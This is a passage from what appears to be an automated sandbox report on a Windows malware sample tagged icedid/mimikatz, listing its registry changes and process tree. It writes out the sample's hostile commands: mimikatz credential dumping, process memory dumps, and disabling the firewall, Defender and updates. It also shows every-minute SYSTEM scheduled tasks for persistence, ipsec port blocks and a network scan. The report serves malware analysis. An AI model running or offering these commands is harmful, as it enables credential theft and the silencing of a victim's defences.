\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ euikgtl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" euikgtl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe -
Modifies registry class 14 IoCs
Processes:
euikgtl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" euikgtl.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
euikgtl.exepid process 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid process 664 664 664 664 664 664 664 664 664 664 664 664 664 664 664 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exepid process 4028 2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exeeuikgtl.exeeuikgtl.exevfshost.exejgqtbilab.execktkgb.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exedescription pid process Token: SeDebugPrivilege 4028 2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2748 euikgtl.exe Token: SeDebugPrivilege 3516 euikgtl.exe Token: SeDebugPrivilege 4512 vfshost.exe Token: SeDebugPrivilege 4344 jgqtbilab.exe Token: SeLockMemoryPrivilege 4752 cktkgb.exe Token: SeLockMemoryPrivilege 4752 cktkgb.exe Token: SeDebugPrivilege 872 jgqtbilab.exe Token: SeDebugPrivilege 1704 jgqtbilab.exe Token: SeDebugPrivilege 2548 jgqtbilab.exe Token: SeDebugPrivilege 2768 jgqtbilab.exe Token: SeDebugPrivilege 3748 jgqtbilab.exe Token: SeDebugPrivilege 2900 jgqtbilab.exe Token: SeDebugPrivilege 3104 jgqtbilab.exe Token: SeDebugPrivilege 4044 jgqtbilab.exe Token: SeDebugPrivilege 4728 jgqtbilab.exe Token: SeDebugPrivilege 3008 jgqtbilab.exe Token: SeDebugPrivilege 1228 jgqtbilab.exe Token: SeDebugPrivilege 4972 jgqtbilab.exe Token: SeDebugPrivilege 4692 jgqtbilab.exe Token: SeDebugPrivilege 4584 jgqtbilab.exe Token: SeDebugPrivilege 2904 jgqtbilab.exe Token: SeDebugPrivilege 2100 jgqtbilab.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exeeuikgtl.exeeuikgtl.exexohudmc.exenslfoo.exeeuikgtl.exeeuikgtl.exepid process 4028 2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe 4028 2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe 2748 euikgtl.exe 2748 euikgtl.exe 3516 euikgtl.exe 3516 euikgtl.exe 4256 xohudmc.exe 1360 nslfoo.exe 3588 euikgtl.exe 3588 euikgtl.exe 6000 euikgtl.exe 6000 euikgtl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.execmd.exeeuikgtl.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid process target process PID 4028 wrote to memory of 3008 4028 2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe cmd.exe PID 4028 wrote to memory of 3008 4028 2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe cmd.exe PID 4028 wrote to memory of 3008 4028 2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe cmd.exe PID 3008 wrote to memory of 4196 3008 cmd.exe PING.EXE PID 3008 wrote to memory of 4196 3008 cmd.exe PING.EXE PID 3008 wrote to memory of 4196 3008 cmd.exe PING.EXE PID 3008 wrote to memory of 2748 3008 cmd.exe euikgtl.exe PID 3008 wrote to memory of 2748 3008 cmd.exe euikgtl.exe PID 3008 wrote to memory of 2748 3008 cmd.exe euikgtl.exe PID 3516 wrote to memory of 1060 3516 euikgtl.exe cmd.exe PID 3516 wrote to memory of 1060 3516 euikgtl.exe cmd.exe PID 3516 wrote to memory of 1060 3516 euikgtl.exe cmd.exe PID 1060 wrote to memory of 4276 1060 cmd.exe cmd.exe PID 1060 wrote to memory of 4276 1060 cmd.exe cmd.exe PID 1060 wrote to memory of 4276 1060 cmd.exe cmd.exe PID 1060 wrote to memory of 2500 1060 cmd.exe cacls.exe PID 1060 wrote to memory of 2500 1060 cmd.exe cacls.exe PID 1060 wrote to memory of 2500 1060 cmd.exe cacls.exe PID 1060 wrote to memory of 3536 1060 cmd.exe cmd.exe PID 1060 wrote to memory of 3536 1060 cmd.exe cmd.exe PID 1060 wrote to memory of 3536 1060 cmd.exe cmd.exe PID 1060 wrote to memory of 3040 1060 cmd.exe cacls.exe PID 1060 wrote to memory of 3040 1060 cmd.exe cacls.exe PID 1060 wrote to memory of 3040 1060 cmd.exe cacls.exe PID 1060 wrote to memory of 2836 1060 cmd.exe cmd.exe PID 1060 wrote to memory of 2836 1060 cmd.exe cmd.exe PID 1060 wrote to memory of 2836 1060 cmd.exe cmd.exe PID 1060 wrote to memory of 2696 1060 cmd.exe cacls.exe PID 1060 wrote to memory of 2696 1060 cmd.exe cacls.exe PID 1060 wrote to memory of 2696 1060 cmd.exe cacls.exe PID 3516 wrote to memory of 3632 3516 euikgtl.exe netsh.exe PID 3516 wrote to memory of 3632 3516 euikgtl.exe netsh.exe PID 3516 wrote to memory of 3632 3516 euikgtl.exe netsh.exe PID 3516 wrote to memory of 3496 3516 euikgtl.exe netsh.exe PID 3516 wrote to memory of 3496 3516 euikgtl.exe netsh.exe PID 3516 wrote to memory of 3496 3516 euikgtl.exe netsh.exe PID 3516 wrote to memory of 988 3516 euikgtl.exe netsh.exe PID 3516 wrote to memory of 988 3516 euikgtl.exe netsh.exe PID 3516 wrote to memory of 988 3516 euikgtl.exe netsh.exe PID 3516 wrote to memory of 4980 3516 euikgtl.exe cmd.exe PID 3516 wrote to memory of 4980 3516 euikgtl.exe cmd.exe PID 3516 wrote to memory of 4980 3516 euikgtl.exe cmd.exe PID 4980 wrote to memory of 1448 4980 cmd.exe wpcap.exe PID 4980 wrote to memory of 1448 4980 cmd.exe wpcap.exe PID 4980 wrote to memory of 1448 4980 cmd.exe wpcap.exe PID 1448 wrote to memory of 4512 1448 wpcap.exe net.exe PID 1448 wrote to memory of 4512 1448 wpcap.exe net.exe PID 1448 wrote to memory of 4512 1448 wpcap.exe net.exe PID 4512 wrote to memory of 4348 4512 net.exe net1.exe PID 4512 wrote to memory of 4348 4512 net.exe net1.exe PID 4512 wrote to memory of 4348 4512 net.exe net1.exe PID 1448 wrote to memory of 3644 1448 wpcap.exe net.exe PID 1448 wrote to memory of 3644 1448 wpcap.exe net.exe PID 1448 wrote to memory of 3644 1448 wpcap.exe net.exe PID 3644 wrote to memory of 4028 3644 net.exe net1.exe PID 3644 wrote to memory of 4028 3644 net.exe net1.exe PID 3644 wrote to memory of 4028 3644 net.exe net1.exe PID 1448 wrote to memory of 3592 1448 wpcap.exe net.exe PID 1448 wrote to memory of 3592 1448 wpcap.exe net.exe PID 1448 wrote to memory of 3592 1448 wpcap.exe net.exe PID 3592 wrote to memory of 4728 3592 net.exe net1.exe PID 3592 wrote to memory of 4728 3592 net.exe net1.exe PID 3592 wrote to memory of 4728 3592 net.exe net1.exe PID 1448 wrote to memory of 2724 1448 wpcap.exe net.exe
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2128
-
C:\Windows\TEMP\tskqpisje\cktkgb.exe"C:\Windows\TEMP\tskqpisje\cktkgb.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4752
-
C:\Users\Admin\AppData\Local\Temp\2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\itspapsg\euikgtl.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:4196 -
C:\Windows\itspapsg\euikgtl.exeC:\Windows\itspapsg\euikgtl.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2748
-
C:\Windows\itspapsg\euikgtl.exeC:\Windows\itspapsg\euikgtl.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4276
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:2500
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3536
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3040
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2836
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:2696
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:3632
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:3496
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:988
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lubbeisit\abkgigiey\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\lubbeisit\abkgigiey\wpcap.exeC:\Windows\lubbeisit\abkgigiey\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4348
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:4028
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:4728
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2724
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:1108
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4408
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:5008
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4228
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3996
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2696
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lubbeisit\abkgigiey\bqalurljg.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lubbeisit\abkgigiey\Scant.txt2⤵PID:1040
-
C:\Windows\lubbeisit\abkgigiey\bqalurljg.exeC:\Windows\lubbeisit\abkgigiey\bqalurljg.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lubbeisit\abkgigiey\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2512 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lubbeisit\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lubbeisit\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:2952 -
C:\Windows\lubbeisit\Corporate\vfshost.exeC:\Windows\lubbeisit\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4512 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ltspunbjs" /ru system /tr "cmd /c C:\Windows\ime\euikgtl.exe"2⤵PID:2556
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:796
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ltspunbjs" /ru system /tr "cmd /c C:\Windows\ime\euikgtl.exe"3⤵
- Creates scheduled task(s)
PID:2856 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "apybablby" /ru system /tr "cmd /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F"2⤵PID:3692
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2904
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "apybablby" /ru system /tr "cmd /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:1392 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "igbsawatu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F"2⤵PID:4040
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4616
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "igbsawatu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4492 -
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:3544
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:5076
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3592
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4456
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:4392
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:4980
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:660
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4440
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:2216
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:3508
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:876
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4704
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:4892
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:4540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:3112
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:4480
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:3060 -
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:412
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:3720 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 772 C:\Windows\TEMP\lubbeisit\772.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4344 -
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:3644
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:5100
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:1108
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:1392
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:4872
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:1352
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:4568
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:5032
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:4716
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:3752
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:2100 -
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:4888
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:4604 -
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:2968
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:3876 -
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:3940
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:2576 -
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4256 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 60 C:\Windows\TEMP\lubbeisit\60.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:872 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2128 C:\Windows\TEMP\lubbeisit\2128.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1704 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2580 C:\Windows\TEMP\lubbeisit\2580.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2548 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2792 C:\Windows\TEMP\lubbeisit\2792.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2768 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2840 C:\Windows\TEMP\lubbeisit\2840.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3748 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 3148 C:\Windows\TEMP\lubbeisit\3148.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2900 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 3852 C:\Windows\TEMP\lubbeisit\3852.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3104 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 3944 C:\Windows\TEMP\lubbeisit\3944.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4044 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 4008 C:\Windows\TEMP\lubbeisit\4008.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4728 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 408 C:\Windows\TEMP\lubbeisit\408.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3008 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 4552 C:\Windows\TEMP\lubbeisit\4552.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1228 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2340 C:\Windows\TEMP\lubbeisit\2340.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4972 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 832 C:\Windows\TEMP\lubbeisit\832.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4692 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 3436 C:\Windows\TEMP\lubbeisit\3436.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4584 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2640 C:\Windows\TEMP\lubbeisit\2640.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
